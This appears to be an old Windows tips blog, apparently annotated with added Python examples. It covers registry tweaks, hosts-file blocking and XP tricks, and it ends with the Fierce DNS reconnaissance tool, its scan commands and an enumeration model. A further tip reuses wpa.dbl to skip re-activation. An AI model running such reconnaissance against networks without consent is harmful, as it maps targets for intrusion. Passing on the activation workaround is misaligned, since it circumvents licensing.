
Change your processor's name

Sunday, December 30, 2007

Go to Start, click Run and type REGEDIT.
Navigate to HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

On the right-hand side, right-click the string value ProcessorNameString, choose Modify, type whatever name you want and click OK.

This only changes the text Windows shows in System Properties; the CPU itself is untouched. The HARDWARE hive is volatile and is rebuilt from the real hardware at every boot, so the original name comes back after a restart.

Turn off system beeps

Navigate to HKEY_CURRENT_USER\Control Panel\Sound. Once there, locate Beep in the list on the right.


  • Right-click it and select Modify

  • Change the value data to no

  • Reboot your computer and the beeps will be gone!

Hide hard drives in Windows vista

Back up your registry before you start!

1. Open Regedit

2. Navigate to one of these keys:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
- this only changes the setting for the currently logged-in user

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
- this changes the setting for all users on the machine. You may have to create the "Explorer" key manually.

3. In the Explorer key, create a new DWORD value by right-clicking Explorer, then choosing New > DWORD Value. Name the value "NoDrives" (without the quotes). This value is a bitmask that controls the visibility of each logical drive, local or network: one bit per letter, A: being bit 0. All drives are visible while its data is 0.

4. Using the table below, enter the decimal number for the drive(s) you want to hide as the NoDrives data. When you right-click NoDrives and choose Modify, make sure Decimal is selected as the base, not Hexadecimal.

Drive Number to hide
A: 1
B: 2
C: 4
D: 8
E: 16
F: 32
G: 64
H: 128
I: 256
J: 512
K: 1024
L: 2048
M: 4096
N: 8192
O: 16384
P: 32768
Q: 65536
R: 131072
S: 262144
T: 524288
U: 1048576
V: 2097152
W: 4194304
X: 8388608
Y: 16777216
Z: 33554432
All drives 67108863

If you want to hide more than one drive, add the numbers for those drives together.

For example, to hide the D: and T: drives, add the value for D: to the value for T::

8 (D) + 524288 (T) = 524296

To hide all drives, set the value to 67108863 (all 26 bits set).

You must log off and back on, or reboot, to see the change.

Note that NoDrives only removes the drive from Explorer, My Computer and the common Open/Save dialogs. Anyone can still reach it by typing the drive letter into Run, a command prompt or an address bar. If you want to block access as well as hide the icon, the companion value NoViewOnDrive (same key, same bit values) does that.
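The arithmetic behind the table, as an added Python example that is not part of the original post: it builds the NoDrives value for any set of drive letters and, more useful when you are reviewing a machine rather than tweaking your own, decodes a value found in a registry export back into the letters it hides. The apply_nodrives helper is my own assumption about how one would write the value with Python's winreg module; it does nothing on non-Windows systems.

```python
import string
import sys

# Bit i of NoDrives hides the drive letter chr(ord("A") + i); there are 26 bits.
ALL_DRIVES_MASK = (1 << 26) - 1  # 0x03FFFFFF = 67108863, the "All drives" row of the table


def nodrives_mask(drive_letters):
    """Return the NoDrives DWORD that hides exactly the given drive letters ("D", "t:", ...)."""
    mask = 0
    for letter in drive_letters:
        letter = letter.strip().rstrip(":").upper()
        if len(letter) != 1 or letter not in string.ascii_uppercase:
            raise ValueError(f"not a drive letter: {letter!r}")
        mask |= 1 << (ord(letter) - ord("A"))
    return mask


def hidden_drives(mask):
    """Decode a NoDrives value (for instance one seen in a .reg export) into the letters it hides."""
    if not 0 <= mask <= ALL_DRIVES_MASK:
        raise ValueError(f"NoDrives value out of range: {mask}")
    return [chr(ord("A") + i) for i in range(26) if mask & (1 << i)]


def apply_nodrives(mask, all_users=False):
    """Hypothetical helper (assumption, not from the post): write the value under the
    per-user or per-machine Policies\\Explorer key. Returns False when not on Windows."""
    if sys.platform != "win32":
        return False
    import winreg  # only importable on Windows

    root = winreg.HKEY_LOCAL_MACHINE if all_users else winreg.HKEY_CURRENT_USER
    path = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    with winreg.CreateKeyEx(root, path, 0, winreg.KEY_SET_VALUE) as key:
        winreg.SetValueEx(key, "NoDrives", 0, winreg.REG_DWORD, mask)
    return True


if __name__ == "__main__":
    value = nodrives_mask(["D", "T"])
    print(value, hidden_drives(value))  # the post's example: 524296 hides D: and T:
```

Decoding is the direction worth remembering: a non-zero NoDrives or NoViewOnDrive under Policies\Explorer on a machine you did not configure is worth a second look, since hiding a drive from Explorer is a cheap way to keep a user from noticing what is on it.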

Hidden secrets(part 1)

Doggy Sound In Acrobat Reader

You need: Acrobat Reader 4.0

Do the following:

1. Open up Acrobat Reader.
2. Choose Help, About Plug-ins, Acrobat Forms.
3. Hold down Control-Alt-Shift and click the Credits button.
4. You should hear a dog bark, the button face will change to say "woof," and the Adobe logo will turn into a dog paw.

Espionage in Excel

You need: Excel 2000 and DirectX

Do the following:

1. Open a new worksheet in Excel 2000.
2. Select File, Save as Web Page.
3. Select Publish and check the box marked Add interactivity with.
4. Save the file as spy.html. Be sure to note the folder you saved the file in.
5. Load Internet Explorer, choose File, Open and locate spy.html. The spreadsheet should appear in the middle of the page.
6. Scroll to row 2000, column WC. Select row 2000, then press Tab until WC is the active column in that row.
7. Hold down Shift-Ctrl-Alt and click the Office logo in the upper-left corner of the dialog box.
8. Get ready to play a Spy Hunter-type game. Use your keyboard to move around and make things happen: the arrow keys let you drive, the space bar fires, "O" drops oil slicks and "H" turns on your headlights when it gets dark.

How to block and unblock websites

Thursday, December 27, 2007

Many schools, colleges and offices block sites such as orkut.

On a machine you administer, the hosts file lets you block a site yourself, or remove a block that someone added the same way. For example, to block www.xyz.com:

* Open the folder C:\WINDOWS\system32\drivers\etc (you need administrator rights to save changes there).
* There you will find a file named HOSTS, with no extension.
* Hold SHIFT and right-click the file, then choose Open with from the menu.
* Select Notepad from the list.
* Under the line 127.0.0.1 localhost, add another line: 127.0.0.2 www.xyz.com (any 127.x.x.x address is loopback on Windows; 0.0.0.0 is another common choice).
* File >> Save.

Now open your web browser and try www.xyz.com; it will not load, because the name resolves to your own machine before DNS is ever consulted.

To unblock a site, delete its line from the file. This only undoes blocks made in the hosts file itself; a block enforced by the school's proxy or firewall is unaffected by anything you write here. Because the hosts file is checked before DNS, it is also a favourite target of malware that redirects banking or update sites to a server the attacker controls, so its contents are worth reading on any machine you suspect.
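The mechanics above as an added Python example (not code from the original post): it produces the same kind of block line, parses a hosts file the way the resolver reads it (comments stripped, first line naming a host wins) and flags the opposite pattern, a watched name pointed somewhere other than loopback or 0.0.0.0, which is what a malicious hosts edit looks like. The sample file content, hostnames and addresses are constructed placeholders.

```python
import ipaddress

# Destinations that make a name go nowhere: the whole loopback block (127.0.0.2 included)
# and the unspecified address, for both IPv4 and IPv6.
SINKHOLE_NETS = [ipaddress.ip_network(n) for n in ("127.0.0.0/8", "0.0.0.0/32", "::1/128", "::/128")]

# Constructed sample, not a real hosts file.
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1       localhost
::1             localhost
127.0.0.2       www.xyz.com            # the block entry from the post
0.0.0.0         ads.example.net        # same effect, the usual choice in published block lists
198.51.100.7    update.example.com     # points off-box: the hijack pattern
127.0.0.1       localhost              # duplicate, ignored because the first line wins
"""


def block_entries(hostnames, sink="127.0.0.2"):
    """Lines to append to the hosts file so that each name resolves to the sink address."""
    return [f"{sink} {name.strip().lower()}" for name in hostnames if name.strip()]


def parse_hosts(text):
    """Map hostname -> address as the resolver sees it: comments and blank lines dropped,
    malformed addresses skipped, and the first entry for a given name wins."""
    mapping = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        try:
            address = str(ipaddress.ip_address(fields[0]))
        except ValueError:
            continue  # not an address; a real resolver ignores the line too
        for name in fields[1:]:
            mapping.setdefault(name.lower(), address)
    return mapping


def is_sinkhole(address):
    """True if the address blocks the name rather than redirecting it somewhere real."""
    addr = ipaddress.ip_address(address)
    return any(addr in net for net in SINKHOLE_NETS)


def hijacked_entries(mapping, watched):
    """Watched names that the hosts file sends to a routable address: redirection, not blocking."""
    return {name: ip for name, ip in mapping.items() if name in watched and not is_sinkhole(ip)}


if __name__ == "__main__":
    hosts = parse_hosts(SAMPLE_HOSTS)
    print(block_entries(["www.xyz.com"]))
    print(hijacked_entries(hosts, {"www.xyz.com", "update.example.com", "ads.example.net"}))
```

On a real machine you would feed parse_hosts the contents of C:\WINDOWS\system32\drivers\etc\hosts and pass the names you care about (your bank, your update servers, your mail host) as the watched set.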

How to create a boot disk

This is quite simple.
1: Go into My Computer.
2: Put a floppy disk in the drive, then right-click the floppy drive and click Format.
3: You will be greeted with a number of options. The one you need is "Create an MS-DOS startup disk".
4: Click OK.

Note: this produces a single MS-DOS startup floppy, and it does NOT contain any CD-ROM drivers, so you cannot boot from it and then install from CD. At the time of writing Microsoft had not yet released a set of Setup boot floppies for Windows XP. You can use an old Windows Me startup disk instead if you prefer, but DOS cannot read NTFS, so that only helps while the drive is still FAT.

Convert a FAT partition to NTFS

To convert a FAT partition to NTFS, perform the following steps.

On Windows NT 4.0/2000, click Start, Programs, then Command Prompt. On Windows XP, click Start, Run, type cmd and press Enter.

At the command prompt, type CONVERT [driveletter]: /FS:NTFS

Convert.exe will attempt to convert the partition to NTFS. If the volume is in use (the system drive always is), it offers to schedule the conversion for the next reboot instead.

NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive to be converted before running the convert command, and to verify the integrity of that backup before proceeding. Conversion is one-way: there is no built-in route back to FAT short of reformatting. The original note also recommends running RDISK to update the emergency repair disk (ERD), but RDISK only exists on Windows NT 4.0; on XP the equivalent is an Automated System Recovery set made with Backup. Finally, review the permissions on the converted volume afterwards: depending on the Windows version, convert may leave it with Everyone: Full Control rather than the defaults a fresh NTFS format would apply, so tighten them if the drive holds anything sensitive.

Lock your folders witout use of software

Now lock your folders without any additional software.


Procedure:
1. Make a folder on the desktop and name it "folder".
2. Open Notepad and write: ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} then choose File > Save As.
3. In the Save As dialog name it lock.bat and click Save (save it on the Desktop).
4. Open Notepad again and write: ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder then choose File > Save As.
5. In the Save As dialog name it key.bat and click Save (save it on the Desktop).
6. Double-click lock.bat to lock the folder. Now if you open your folder, Control Panel opens instead!
7. Double-click key.bat to unlock it, and you can access the data inside the folder again.
8. Lock your folder and hide key.bat somewhere else on your hard disk.
9. Whenever you want to open your folder, copy key.bat back to the desktop and run it.

Simple!

What is actually happening: that GUID is the CLSID of Control Panel, and Explorer treats a folder whose name ends in .{CLSID} as that shell object instead of listing its contents. Nothing is encrypted or access-controlled. Anyone who knows the trick can rename the folder back (key.bat is a one-line rename), open a command prompt and cd "folder.{21EC2020-3AEA-1069-A2DD-08002B30309D}" to read the files directly, or use any file manager other than Explorer. Treat this as a way to keep a folder out of casual browsing, not as protection for anything sensitive; for that, use NTFS permissions or EFS.

Ever wanted to maintain a diary on your PC

Ever wanted to maintain a diary on your PC?
Now you can do it without any extra software!

USE NOTEPAD!

Do the following:
1. Open Notepad
2. On the first line type: .LOG (upper case, with the leading dot)
3. Save it with any name, say Diary.txt
4. Open Diary.txt again

Every time you open the file, Notepad appends the current date and time at the end, so start writing your diary!

Make your own icon in Windows XP

Now even personalize your ICONS with Windows XP !

To make your own ICON :

1. Start>>All Programs>>Accessories
2. Click Paint
3. In toolbar select Image
4. Click Attributes

--------------------- Note: the size of an icon is 32 x 32 pixels! ---------------------

5. Type 32 in both Height and Width and make sure that Pixels is selected under Units
6. Click OK
7. Now add your photo or design .
8. File>>Save As
9. Type name.ico
10. Click Save

Enjoy your New ICON !!!

Xp registry hacks

Friday, December 14, 2007

Editing the Windows Registry, while much more common now than in years past, is still not to be entered into lightly. You can break Windows, cause boot failure, yada, yada. I know you're gonna do it anyway; why else would you be reading this. Just be careful, OK?

These are few because, for the most part, WinXP can be customized through the interface or with third-party freeware (as above).

All of the tips below require running regedit. To do so, hit 'Start/Run' then type 'regedit' and follow the instructions.

Naturally, I take no responsibility for any damage or loss of data incurred in the remote possibility that something goes terribly wrong.

Outlook Explorer Splash
If it's important enough to you to edit the registry in order to get rid of the OE splash page, here's how. With regedit open, go to HKEY_CURRENT_USER\Identities\{long number here will vary}\Software\Microsoft\Outlook Express\5.0. Left-click on 5.0, then right-click on a blank space in the pane on the right side. Choose 'New' DWORD and name it NoSplash with a value of 1.

Unload DLLs
To prevent Windows from caching DLLs after the program using them has closed, follow this procedure: navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ then left-click on Explorer. Right-click (as above) and create the DWORD AlwaysUnloadDLL with a value of 1. This requires a reboot to take effect. Be aware that this value is only honoured by Windows 98/Me; Windows 2000 and XP ignore it, so on XP it changes nothing, for better or worse.

Hack IE Title Bar
This can be an impressive bit of personalization. Use your name or moniker to brand Internet Explorer. Go to
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ and left-click on Main to change the string "Window Title" to whatever you wish.

Encode MP3s with WiMP
Install an MP3 codec (compression/decompression, required for this operation; the original post linked to a download). Once installed, navigate to the following key in regedit:
HKEY_LOCAL_MACHINE\Software\Microsoft\MediaPlayer\Settings\ then to MP3Encoding and set the following:
"LowRate"=dword:0000dac0
"MediumRate"=dword:0001f400
"MediumHighRate"=dword:0003e800
"HighRate"=dword:0004e200
After reboot, you'll be in the MP3 business without third-party software.

Xp tricks part 2

One-Button Adjustment
To change the built-in functions for either speed or visual effects, right-click on the 'My Computer' icon, then 'Properties' and the 'Advanced' tab. Hit the 'Settings' button and choose either 'Adjust for best appearance' or 'Adjust for best performance' to flip the switch on all of the graphical enhancements.

Folder Icons
For all folders except Thumbnails, pictures may be added or different icons may be chosen, either from those in SHELL32.dll (default) or from any icon collection on your hard drive. Just right-click on the folder, choose 'Properties' then the 'Customize' tab & browse away.

Clear Type Innovation
This little goody, originally developed for laptops, will enhance your experience, both on and off the Internet. Hey, don't take my word for it: run Microsoft's ClearType tuner (the original post linked to it), say 'Yes' to the little program install, then tune and tweak to your heart's content. You will enjoy the results.

Change is Good and So Easy
The quickest way to change your user name and the picture that appears next to it on the Start Menu is to double-click on that picture. From the menu that appears, you can change lotsa stuff. Pick a new picture. The pictures are 48 X 48 by default, but Windows XP will resize whatever you choose. The closer to the default size (and square), the better your results will be. Scan your face. Have fun with it. You can also prevent the irritating highlighting of newly-installed programs. Leave the option 'Set up my account to use .NET Passport' alone 'cause it's a security nightmare.

Your Desktop - Your Choices
Right-click on the Desktop, select 'Properties' then the 'Desktop' tab.
Hit the 'Customize Desktop' button and select which icons you want to appear.

In order to allow items (like custom shortcuts) to be added to the Taskbar, just right-click on it, choose 'Toolbars' then 'Quick Launch.' Delete any icons you don't want, drag shortcuts from the desktop to this new area.

Folder Options
Each folder can use its own display properties, set from the 'View' drop-down menu. Thumbnails makes sense for folders that contain images, of course. To speed the loading of this option go to the Control Panel and click 'Folder Options.' Under the 'View' tab, be certain that 'Do not cache thumbnails' is not checked.

The Ultimate Appearance Tweak
Microsoft Sez: "You can connect up to 10 monitors to your Windows XP-based computer and display numerous programs or windows at one time. You can use your mouse to move items from one monitor to
another. You can open a different file on each monitor. Or several. Or you can stretch one item across several monitors; so for example, you can see more columns in a Microsoft Excel spreadsheet, or the entire layout of a Web page, without scrolling." Consider it. Monitors and PCI video cards are pretty cheap now. Windows recognizes the addition & allows easy adjustments on the 'Display Properties/Settings' menu.

Xp tricks part 1

Activate Once Forever
Windows will require re-activation if several pieces of hardware are changed at one time. It makes sense to try to spread these installations out to avoid the hassle.

But what if the WinXP OS must be re-installed on the same system? To avoid having to re-activate, keep a copy of wpa.dbl from the System32 folder with your backups. Make sure to create a fresh copy with any hardware upgrade. Upon re-installing WinXP, just copy wpa.dbl back to the System32 folder to skip activation.

Deactivate WinXP 'Spyware'
Although mentioned on the Windows Tweaks page, it's worth repeating here if you missed it. Win XP users have a new set of security issues, including a plethora of default settings that cause 'phone home' activity, automatic updates and downloads without user choice or intervention. The original post linked to a manual procedure for disabling these and to free software that changes the settings easily.

WinXP Power Toys
This versatile (unsupported) collection of goodies from Microsoft includes:

Tweak UI: Provides access to system settings that are not exposed in the Windows XP default user interface, including mouse settings, Explorer settings, taskbar settings, and more.

Super-Fast User Switcher: Switch between users without having to go through the Logon screen (see Quick Tips, below, for another way).

Open Command Window Here: Adds an "Open Command Window Here" context menu option on file system folders.

Taskbar Magnifier: Magnify part of the screen from the taskbar.

Power Calculator: Graph and evaluate functions as well as perform many different types of conversions.

Image Resizer: Resize one or many image files with a right-click.

CD Slide Show Generator: View images burned to a CD as a slide show.

Virtual Desktop Manager: Manage up to four desktops from the Windows taskbar. Multi-monitors is much better.

Webcam Timershot: Lets you take pictures at specified time intervals from a Webcam connected to your computer and save them to a location that you designate.

HTML Slide Show Wizard: Helps you create an HTML slide show of your digital pictures, ready to place on your Web site.

Microsoft pulled Power Toys for WinXP to de-bug them, and re-released them on April 23, 2002. This time, these proggies are available separately, which is a good thing.

Don't forget IE Powertoys, a cool collection of enhancements designed for IE5.x but which work beautifully with IE6.x. Find it on the Internet page. Useful, fun and the price is right.

Hide Recycle Bin
Yes, there's a registry or 'inf' file hack for this, but why? Download TweakUI, above, change the Recycle Bin to a folder (so you can move it off the Desktop, like into My Documents), eliminate the icon and revel in your pristine desktop, without an icon to be seen (if you choose). Hey, your wallpaper looks great!

Remove 'Shortcut to' prefix and arrow
See TweakUI, above. Don't hack the registry unnecessarily.

Dig into the system
Yes, there is a command (ipconfig) that displays or configures IP information at the command prompt, but a sweeter solution is the GUI goodness of the familiar winipcfg from Win 9.x/Me. Download it from Microsoft (the original post linked to it), install it, then hit Start/Run, type winipcfg and hit 'Enter.' You're so clever.

To access information on your entire system, including hardware, installed software application info and more, hit Start/Run and type winmsd. To access more information as well as change default startup items (harmlessly), try Start/Run msconfig.

Task Manager in WinXP is a versatile tool which displays running applications and processes (ala Ctrl/Alt/Del in Win 9.x/Me) as well as graphical display of Performance items like CPU, Page File Usage and Networking information. Right-click on the Taskbar and select 'Task Manager (keyboard shortcut Ctrl/Shift/Esc), Try it & see.

To configure virtually any aspect of WinXP hardware, software and behavior, hit Start/Run, type gpedit.msc and hit 'Enter' to access the Group Policy Editor. This is where you can turn off 'Autoplay' for CD-ROMs if you wish. Note that gpedit.msc ships only with XP Professional; Home Edition does not include it. Have fun in there.

Those Nasty Balloon Tips
These things are like the neighbor's wind chimes; an annoyance foisted upon us against our will that only gets more irritating with time. The quick, easy method of disposal is with 'Group Policy Editor, above. No third-party software or registry hacking is necessary. Choose' Disable Balloon Tips' and breathe a sigh of relief. Too bad there's no 'Delete' button for annoying neighbors.

WinXP Quick Tips
There are several methods (some involve risky and unnecessary registry hacks) for removing the persistent and annoying MSN Messenger. Hit 'Start/Run' then copy and paste the following: 'RunDll32 advpack.dll,LaunchINFSection %windir%\INF\msmsgs.inf,BLC.Remove' (without the quotes). Hit enter and it's gone.

To enable sending items wherever you wish on your computer easily, enable hidden and systems folders in the 'View' folder settings, open
C:\Documents and Settings\your_user_name\SendTo\ and add shortcuts to whatever locations you wish.

With the Super-Fast User Switcher PowerToy installed, instantly switch between users by pressing the Win key and 'Q' together. After a moment, all users appear. Keep hitting 'Q' to rotate between them.

Keeping applications minimized rather than in open windows makes Task Manager report far less memory for them, because Windows trims a window's working set when it is minimized. The pages come back when you restore the window, so this is mostly a cosmetic saving unless the machine is genuinely short of RAM.

To create a keyboard shortcut from a desktop shortcut, right-click on the shortcut, choose properties and enter the combination in the Shortcut Key box, including two of the following: CTRL, ALT, and/or SHIFT. OK out and it's done.

To eliminate the annoying question "Are you sure?" when you delete an item, right-click on the Recycle Bin icon, choose 'Properties' and remove the (default) checkmark from 'Display delete confirmation dialog.'

Prefetch works great to speed up application launches in WinXP. A widely repeated tip says the C:\WINDOWS\Prefetch folder needs a cleanout every few weeks (Edit, 'Select All,' then 'Delete'), but the folder is self-maintaining: Windows caps it at 128 entries and prunes it itself, and emptying it makes every program start slowly once while its trace is rebuilt, so the net effect is negative. The .pf files are also a record of which programs have run on the machine, which is exactly what you want intact when investigating an incident.

Unless you spend most computer time doing searches, this tweak will add a little speed to your system. Open my computer, right-click on C:\ and select 'Properties.' Uncheck 'Allow indexing service to index this disk for faster searches.' uncheck this OK out. Select 'Apply to all folders and subfolders' in the pop-up window.

To prevent the operating system from asking for the WinXP disk during installations, copy the I386 folder from the XP CD and paste it into the C:\ drive. If Windows still asks, check that the SourcePath value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup points at C:\ rather than the CD drive. That'll stop it.

What? You actually used the Briefcase in Win9.x/Me? OK, to get it back on the desktop in XP, go to C:\WINDOWS\system32\dllcache and double click on 'syncapp' to place it on your desktop.

If you've removed the Recycle Bin from the Desktop (see Registry Hacks, below), you can access it by either from a 'Desktop' Toolbar added by right-clicking on the Taskbar and choosing 'Toolbars' and putting a checkmark by that setting or by opening 'My Documents' & going up one level.

If you don't want XP to display the programs in the Start Menu that it determines are used most frequently, right-click in the empty space on the left side of the menu, choose 'Properties' then 'Start Menu' and Customize. Click on 'Clear List' and set number to zero.

Right–click My Computer, and then click 'Properties' then 'Advanced.' From here you can choose for what functions the greater portion of processing and power is used and set virtual memory if you're so inclined.

To place the programs you want permanently on the Start Menu, right-click on the program from the pop-up menu and choose 'Pin to Start Menu.'

For a quick desktop shortcut to any folder, file or application, find the target on your hard drive, right-click and choose 'Send to Desktop.'

New Tips for June, 2002
Shutting down WinXP is a three-click process, but it's easy to make it a single-click process, either from a desktop or Taskbar icon. Right-click on the Desktop, choose 'New' then 'Shortcut.' A window will pop up with a dialog box for the shortcut path. Type this exactly: C:\windows\system32\shutdown.exe -s -t 00 keeping in mind that the last character is a zero, not a capital O (to make a similar shortcut for restart, substitute -r for -s). Choose 'Next' and type in a name for your new shortcut. Right-click on your new shortcut, choose 'Properties' then 'Change Icon' to make it attractive. Leave it on your desktop or drag it to your taskbar.

If you haven't already found it, making the text background that appears beneath desktop icons transparent is a snap. Go to the Control Panel, choose 'System' then 'Advanced'. Click on the 'Performance' tab then 'Settings' and put a check in the 'Use Drop Shadows' box. Voila!

To keep those ugly lines from forming beneath the text on your desktop icons, go to the Control panel and choose 'Folder Options' to be certain that 'Underline icon titles consistent with my browser' is checked. Open 'Internet Options' then the 'Advanced' tab. Under 'Browsing' look for 'Underline Links' and choose 'Never.' Now, doesn't that look better?

Now that the 'official' release of WinXP has passed the six-month mark, some of you may be experiencing some performance degradation, the source of which can't be traced. Before resorting to the sure-fire re-format and re-install, try this simple procedure. Create a new user name (with Administrator rights). See if this 'New User' experiences better performance. If so, switch to your original user name, transfer settings and accounts to the 'New User' and enjoy the improved performance. Once you're satisfied that all settings and accounts have transferred properly, eliminate your old user name and run RegCleaner to eliminate outdated settings.

Boot Disk Returns
Unlike Win2000, WinXP can and will produce a boot disk. Stuff a floppy into the drive, open 'My Computer' then '3 1/2" Floppy Drive,' right-click and choose 'Format'. From the options, choose 'Create an MS-DOS startup disk.'

Microsoft Sez:
"Customer research shows a frequently requested feature that users want from their PCs is fast system startup, whether from cold boot or when resuming from standby or hibernation." If you're not booting in less than 30 seconds, get the Microsoft tool the original post linked to; it speeds up boot times with varying but (to my knowledge) never negative results.

Save Streaming Media
It's cool to listen to MP3s (or watch movies) over the Internet. Often, saving this media, however, seems impossible. Hey, if it plays on your computer, it's on your hard drive. Once the file is fully loaded and with folder view set to show hidden and systems folders, search for the media (.mp3 or .mpg). There it is!

IE 6 Stuff
New security features in IE 6.x are cool, but if you'd rather not have the web pages you've viewed to be stored on your computer, you have to choose the option manually. From the 'Tools' menu, select 'Internet Options,' then 'Advanced.' Under 'Security,' check 'Empty Temporary internet files folder when browser is closed.'

If you prefer Google (as most do) as the search engine of choice, put the page on your hard drive ('File/Save As' from IE 6.x), then open the saved with the browser and from 'Tools/Internet Options/General,' choose 'Use Current' to have IE load instantly and already Googlized

Fierce domain scan

Fierce domain scan was born out of personal frustration after performing a web application security audit. It is traditionally very difficult to discover large swaths of a corporate network that are non-contiguous. It's terribly easy to run a scanner against an IP range, but if the IP ranges are nowhere near one another you can miss huge chunks of networks.

First what Fierce is not. Fierce is not an IP scanner, it is not a DDoS tool, it is not designed to scan the whole internet or perform any un-targeted attacks. It is meant specifically to locate likely targets both inside and outside a corporate network. Only those targets are listed (unless the -nopattern switch is used). No exploitation is performed (unless you do something intentionally malicious with the -connect switch). Fierce is a reconnaissance tool. Fierce is a PERL script that quickly scans domains (usually in just a few minutes, assuming no network lag) using several tactics.

First it queries your DNS for the DNS servers of the target. It then switches to using the target's DNS server (you can use a different one if you want using the -dnsserver switch but this can cause problems if the server you use won't tell you information about other people's sites and of course you won't find much relevant internal address space). Fierce then attempts to dump the SOA records for the domain in the very slim hope that the DNS server that your target uses may be misconfigured. Once that fails (because it almost always will) it attempts to "guess" names that are common amongst a lot of different companies. Don't ask me where I got the list, it's just a list of names that id and I have seen all over the place. I thought about adding a dictionary to this, but I think that would take a lot longer, and given that very few of the words are dictionary words I don't think this would add a lot of value.

Next, if it finds anything on any IP address it will scan up and down a set amount (default 5 but you can expand it with -traverse or increase it to the entire subnet with -wide) looking for anything else with the same domain name in it using reverse lookups. If it finds anything on any of those it will recursively scan until it doesn't find any more. In this way it ends up looping a lot, and the bigger the domain is the more you get back. The reason Fierce automatically switches to using the target's DNS server is so that it can probe the Intranet (RFC1918) of the target, assuming the target uses a single DNS server for both their Intranet and external sites.

I also added a random call to something that should fail to test for wildcard DNS. If it's found, the wildcard is discarded to reduce erroneous results. That doesn't speed up the scan because it still needs to check to see if the test resolves back to IP address that the wildcard is pointing to. However it does reduce false positives.
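The three steps just described (guessing common names, discarding hits that only reflect a wildcard, then walking reverse lookups up and down from every hit until nothing new appears) as an added Python model. This is not Fierce's code and does no network I/O: the resolver is a stub over a constructed zone, and every hostname, address and wordlist entry in it is made up. Against real DNS you would swap the stub for a library such as dnspython and query the target's own name server, as the text explains.

```python
import ipaddress
import random
import string

# Constructed zone for the demo: documentation range 203.0.113.0/24 plus RFC1918 space.
SAMPLE_ZONE = {
    "www.example.com": "203.0.113.10",
    "mail.example.com": "203.0.113.12",
    "vpn.example.com": "203.0.113.15",        # not in the wordlist; only reachable by the reverse walk
    "intranet.example.com": "10.10.10.5",     # internal host, found by walking from dev.example.com
    "dev.example.com": "10.10.10.8",
    "otherco.example.net": "203.0.113.11",    # wrong domain: seen on the walk but not reported
}
WORDLIST = ["www", "mail", "dev", "ns1"]      # stand-in for hosts.txt


class StubResolver:
    """Offline stand-in for Net::DNS: A and PTR lookups over a zone dict, plus an
    optional wildcard (*.domain -> one IP) so the wildcard check has something to catch."""

    def __init__(self, zone, wildcard=None):
        self.forward = {name.lower(): ip for name, ip in zone.items()}
        self.reverse = {ip: name.lower() for name, ip in zone.items()}
        self.wildcard = wildcard  # (domain, ip) or None

    def a(self, name):
        name = name.lower().rstrip(".")
        if name in self.forward:
            return self.forward[name]
        if self.wildcard and name.endswith("." + self.wildcard[0]):
            return self.wildcard[1]
        return None

    def ptr(self, ip):
        return self.reverse.get(ip)


def detect_wildcard(resolver, domain):
    """Resolve a random label under the domain; an answer means a wildcard, and that IP is noise."""
    label = "".join(random.choices(string.ascii_lowercase, k=12))
    return resolver.a(f"{label}.{domain}")


def brute_force(resolver, domain, wordlist, wildcard_ip):
    """Guess common names, dropping hits that merely reflect the wildcard."""
    found = {}
    for word in wordlist:
        name = f"{word}.{domain}"
        ip = resolver.a(name)
        if ip is not None and ip != wildcard_ip:
            found[name] = ip
    return found


def neighbours(ip, span):
    """The addresses 'span' below and above ip (Fierce's default traversal is 5)."""
    base = int(ipaddress.IPv4Address(ip))
    for offset in range(-span, span + 1):
        candidate = base + offset
        if offset != 0 and 0 <= candidate < 2 ** 32:
            yield str(ipaddress.IPv4Address(candidate))


def in_domain(name, domain):
    return name == domain or name.endswith("." + domain)


def enumerate_domain(resolver, domain, wordlist, span=5):
    """Brute-force, then reverse-walk around every hit, recursing until no new host
    in the target domain turns up. Returns ({name: ip}, wildcard_ip)."""
    wildcard_ip = detect_wildcard(resolver, domain)
    found = brute_force(resolver, domain, wordlist, wildcard_ip)
    queue = list(found.values())
    walked = set()
    while queue:
        ip = queue.pop()
        if ip in walked:
            continue
        walked.add(ip)
        for candidate in neighbours(ip, span):
            name = resolver.ptr(candidate)
            if name and in_domain(name, domain) and name not in found:
                found[name] = candidate
                queue.append(candidate)  # every new hit seeds another walk
    return found, wildcard_ip


if __name__ == "__main__":
    resolver = StubResolver(SAMPLE_ZONE, ("example.com", "203.0.113.200"))
    hosts, wildcard = enumerate_domain(resolver, "example.com", WORDLIST)
    print(f"wildcard IP: {wildcard}")
    for name, ip in sorted(hosts.items()):
        print(f"{ip:>15}  {name}")
```

Run as is, the walk finds vpn.example.com and the 10.10.10.5 intranet host that no wordlist would have guessed, ignores otherco.example.net even though it sits between two hits, and throws away ns1.example.com because it only resolved through the wildcard. That is the whole point of the tool: the wordlist only has to land one foothold per block.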

Also, I've added a "search" option that allows you to find other non-related domain names. For example, let's say my target's domain is widget.com but I know they have email addresses like soandso@widgetcompany.com and own another company called nutsandbolts.com I can add search queries. This won't scan for those domains, but if those names pop up, it won't ignore them. Fierce will report on anything inside the search pattern as long as it matches. If you want everything I guess you could put a,b,c,...,x,y,z but I'll probably make something in the future to allow for scanning/reporting the entire C block once anything is found in it that matches the DNS string. Here's the syntax:

perl fierce.pl -dns widget.com -search widgetcompany,nutsandbolts

I also realized it can be a little bad about finding everything in a class C if the target used non-contiguous blocks within the class C. To deal with that I built in a function to allow a scan (of only C blocks). This is also really useful for scanning intranets if the DNS is poorly configured. I might expand on this later.

perl fierce.pl -range 10.10.10.0-255 -dnsserver ns1.example.com

As an alternative, you can use the -wide switch which does a wide path of reverse lookups after finding any C names that match your query in the C block. This provides a lot more information but is a lot more noisy.

perl fierce.pl -dns example.com -wide -file output.txt

